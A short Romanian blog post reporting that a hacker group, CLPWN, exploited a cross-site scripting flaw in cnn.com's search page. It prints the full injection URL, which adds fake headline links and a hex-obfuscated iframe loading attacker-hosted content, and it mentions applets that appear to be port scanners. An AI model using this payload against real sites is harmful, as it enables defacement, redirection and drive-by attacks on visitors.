cnn.com compromised

Un grup de hackeri denumit “CLPWN” a reu?it sa g?seasc? un XSS exploit pentru site-ul cnn.com.

Folosind un bug in codul din search.jsp au reu?it sa redirec?ioneze traficul c?tre site-ul lor.

Query-ul folosit a fost:

http://search.cnn.com/search.jsp?query=%22%3E%3C/a%3E%3Ch2%3E%3Ca%20href%3dhttp://clpwn.com%3EEvil%20webhackers%20CLPWN.COM%20compromise%20CNN.com%20with%20Web%20Hack%20Attacks!%3C/a%3E%3Cbr%3E%3Ca%20href%3d%22http://www.clpwn.com/?cnn%22%3EWeb%20Hackers%20CLPWN.COM%20destroy%20CNN.COM%20with%20deadly%20cross-site%20exploit%20attack!%3C/a%3E%3Cbr%3E%3Ca%20href%3d%22http://clpwn.com/?lol%22%3EExperts%20say%20web%20hackers%20TEAM%20CLPWN%20capable%20of%20destroying%20the%20internet%3C/a%3E%3Cbr%3E%3Ca%20href%3dhttp://www.clpwn.com%3EWebhackers%20attack%20major%20news%20portals:%20Breaking%20News%3C/a%3E%3Cbr%3E%3Ch2%3E%3Cbr%3E%%22%3E%3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70%3A//c99%2eclpwn%2eco%6D%2F%68%6D%2E%68%74%6D%3E%3Ci%20&type=web&sortBy=date&intl=false

iar redirect-ul face o gramada de lucruri “dr?gu?e”. Inca nu am apucat sa ma uit in appletul java folosit si in swf-ul folosit dar par a fi port scannere si alte jucarii interesante.

Mai multe detalii aici: